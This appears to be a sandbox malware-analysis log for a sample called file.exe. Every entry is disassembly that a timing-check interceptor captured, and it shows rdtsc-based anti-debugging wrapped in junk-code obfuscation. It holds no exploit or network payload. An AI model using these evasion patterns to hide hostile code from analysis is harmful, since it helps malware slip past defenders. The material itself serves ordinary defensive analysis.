        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310394 second address: 53103D0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [75AF4538h] 0x0000000c jmp 00007FA1CCF9D8C4h 0x00000011 xor dword ptr [ebp-08h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA1CCF9D8C7h 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53103D0 second address: 5310468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b jmp 00007FA1CCCD2157h 0x00000010 nop 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA1CCCD2154h 0x00000018 or esi, 5366AE98h 0x0000001e jmp 00007FA1CCCD214Bh 0x00000023 popfd 0x00000024 mov ax, FC4Fh 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b call 00007FA1CCCD214Bh 0x00000030 pushad 0x00000031 popad 0x00000032 pop eax 0x00000033 mov esi, edx 0x00000035 popad 0x00000036 nop 0x00000037 jmp 00007FA1CCCD2151h 0x0000003c lea eax, dword ptr [ebp-10h] 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov di, ACBEh 0x00000046 mov bx, D6CAh 0x0000004a popad 0x0000004b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310468 second address: 53104D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA1CCF9D8BEh 0x00000016 jmp 00007FA1CCF9D8C5h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FA1CCF9D8C0h 0x00000022 sbb eax, 04FD7818h 0x00000028 jmp 00007FA1CCF9D8BBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [ebp-18h], esp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53104D5 second address: 53104D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53104D9 second address: 53104DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53104DF second address: 531050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f jmp 00007FA1CCCD2150h 0x00000014 mov ecx, dword ptr [eax+00000FDCh] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531050F second address: 5310513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310513 second address: 5310530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310530 second address: 531055E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a pushad 0x0000000b push ebx 0x0000000c mov cx, CF4Dh 0x00000010 pop esi 0x00000011 mov di, A44Eh 0x00000015 popad 0x00000016 jns 00007FA1CCF9D8E4h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA1CCF9D8C0h 0x00000023 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531055E second address: 5310583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d jmp 00007FA1CCCD214Fh 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310583 second address: 5310589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310589 second address: 531058D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531058D second address: 5310591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310591 second address: 53105AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FA1CCCD214Ch 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300015 second address: 5300079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA1CCF9D8C7h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA1CCF9D8C0h 0x00000016 sbb eax, 0A4C6F08h 0x0000001c jmp 00007FA1CCF9D8BBh 0x00000021 popfd 0x00000022 push ecx 0x00000023 mov ah, bh 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a pushad 0x0000002b movzx eax, bx 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA1CCF9D8BEh 0x00000038 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300079 second address: 53000B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 pushfd 0x00000013 jmp 00007FA1CCCD214Ch 0x00000018 adc eax, 0E844EF8h 0x0000001e jmp 00007FA1CCCD214Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53000B1 second address: 53000B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53000B7 second address: 53000BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53000BB second address: 53000F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FA1CCF9D8BCh 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FA1CCF9D8C0h 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA1CCF9D8BAh 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53000F2 second address: 53000F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53000F6 second address: 53000FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53000FC second address: 530011F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1CCCD214Eh 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53001E6 second address: 530020A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test al, al 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530020A second address: 5300211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300361 second address: 53003DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FA1CCF9D8C0h 0x0000000c adc esi, 578520E8h 0x00000012 jmp 00007FA1CCF9D8BBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test eax, eax 0x0000001d jmp 00007FA1CCF9D8C6h 0x00000022 jg 00007FA23D73B99Dh 0x00000028 jmp 00007FA1CCF9D8C0h 0x0000002d js 00007FA1CCF9D8F3h 0x00000033 jmp 00007FA1CCF9D8C0h 0x00000038 cmp dword ptr [ebp-14h], edi 0x0000003b pushad 0x0000003c pushad 0x0000003d mov ah, bh 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 mov bx, cx 0x00000045 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53003DE second address: 5300407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FA23D4701FEh 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop edi 0x00000011 call 00007FA1CCCD214Ch 0x00000016 pop esi 0x00000017 popad 0x00000018 popad 0x00000019 mov ebx, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300407 second address: 530040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530040B second address: 5300411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530051C second address: 5300520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300520 second address: 5300524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300524 second address: 530052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530052A second address: 5300530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300530 second address: 5300534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300534 second address: 5300538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300538 second address: 5300557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FA1CCF9D8C3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300557 second address: 530056B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov di, 020Ah 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53005A8 second address: 5300605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA1CCF9D8BBh 0x00000013 sub eax, 512A341Eh 0x00000019 jmp 00007FA1CCF9D8C9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FA1CCF9D8C0h 0x00000025 add esi, 6BDFBA18h 0x0000002b jmp 00007FA1CCF9D8BBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300605 second address: 530061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCCD2154h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530061D second address: 52F0E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA23D73B8E6h 0x0000000e xor eax, eax 0x00000010 jmp 00007FA1CCF76FEAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 cmp esi, 00000000h 0x00000025 setne al 0x00000028 xor ebx, ebx 0x0000002a test al, 01h 0x0000002c jne 00007FA1CCF9D8B7h 0x0000002e jmp 00007FA1CCF9D9BFh 0x00000033 call 00007FA1D1CFA121h 0x00000038 mov edi, edi 0x0000003a jmp 00007FA1CCF9D8C0h 0x0000003f xchg eax, ebp 0x00000040 pushad 0x00000041 pushad 0x00000042 movzx eax, bx 0x00000045 mov edi, 1016052Ch 0x0000004a popad 0x0000004b jmp 00007FA1CCF9D8C5h 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E87 second address: 52F0E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E8D second address: 52F0E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E93 second address: 52F0E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0E97 second address: 52F0EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0EA6 second address: 52F0EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0EAA second address: 52F0EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0EB0 second address: 52F0EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0EB6 second address: 52F0EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0EBA second address: 52F0EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F0EBE second address: 52F0F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FA1CCF9D8C5h 0x0000000f xchg eax, ecx 0x00000010 jmp 00007FA1CCF9D8BEh 0x00000015 push eax 0x00000016 jmp 00007FA1CCF9D8BBh 0x0000001b xchg eax, ecx 0x0000001c jmp 00007FA1CCF9D8C6h 0x00000021 mov dword ptr [ebp-04h], 55534552h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA1CCF9D8C7h 0x0000002f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300A69 second address: 5300AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA1CCCD214Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FA1CCCD214Ch 0x00000019 sbb ecx, 5331B088h 0x0000001f jmp 00007FA1CCCD214Bh 0x00000024 popfd 0x00000025 jmp 00007FA1CCCD2158h 0x0000002a popad 0x0000002b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300AD1 second address: 5300AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300AD7 second address: 5300ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300ADB second address: 5300AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ecx, 4A8064A9h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300AF7 second address: 5300B81 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dh, al 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA1CCCD2153h 0x00000012 jmp 00007FA1CCCD2153h 0x00000017 popfd 0x00000018 push eax 0x00000019 pushfd 0x0000001a jmp 00007FA1CCCD214Fh 0x0000001f add cx, 14EEh 0x00000024 jmp 00007FA1CCCD2159h 0x00000029 popfd 0x0000002a pop eax 0x0000002b popad 0x0000002c cmp dword ptr [75AF459Ch], 05h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA1CCCD2159h 0x0000003c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300B81 second address: 5300B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300B85 second address: 5300B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300B8B second address: 5300B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300B91 second address: 5300B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300C09 second address: 5300C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8C1h 0x00000008 mov eax, 599C14E7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 17D6E32Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA1CCF9D8C9h 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300D49 second address: 5300D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300D4D second address: 5300D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53109AE second address: 53109B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53109B4 second address: 53109B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53109B8 second address: 53109CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1CCCD214Bh 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53109CE second address: 5310A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1CCF9D8BFh 0x00000009 adc esi, 5AE7504Eh 0x0000000f jmp 00007FA1CCF9D8C9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310A03 second address: 5310A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1CCCD2153h 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310A22 second address: 5310A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8C4h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310A3A second address: 5310B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA1CCCD2154h 0x00000014 and ecx, 612B4188h 0x0000001a jmp 00007FA1CCCD214Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FA1CCCD2158h 0x00000026 jmp 00007FA1CCCD2155h 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, esi 0x0000002e jmp 00007FA1CCCD214Eh 0x00000033 push eax 0x00000034 jmp 00007FA1CCCD214Bh 0x00000039 xchg eax, esi 0x0000003a jmp 00007FA1CCCD2156h 0x0000003f mov esi, dword ptr [ebp+0Ch] 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FA1CCCD214Eh 0x00000049 xor al, FFFFFFD8h 0x0000004c jmp 00007FA1CCCD214Bh 0x00000051 popfd 0x00000052 mov ah, 82h 0x00000054 popad 0x00000055 test esi, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FA1CCCD214Eh 0x0000005e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310B0E second address: 5310B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 57E06DE4h 0x00000008 jmp 00007FA1CCF9D8BDh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FA23D71B147h 0x00000016 pushad 0x00000017 mov si, DE03h 0x0000001b mov eax, 5A81575Fh 0x00000020 popad 0x00000021 cmp dword ptr [75AF459Ch], 05h 0x00000028 jmp 00007FA1CCF9D8C2h 0x0000002d je 00007FA23D7331FDh 0x00000033 pushad 0x00000034 call 00007FA1CCF9D8BEh 0x00000039 mov si, 2BD1h 0x0000003d pop ecx 0x0000003e push ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310BBC second address: 5310BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 19E7h 0x00000007 mov dh, cl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d pushad 0x0000000e mov edi, 538E8FC4h 0x00000013 popad 0x00000014 mov dword ptr [esp], esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA1CCCD2156h 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310BEB second address: 5310BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BEh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310C2B second address: 5310C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCCD214Ch 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5310C3B second address: 5310C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AE275 second address: 64AE294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007FA1CCCD2154h 0x0000000f pop edi 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AE294 second address: 64AE2AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8C5h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AE2AD second address: 64AE2B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
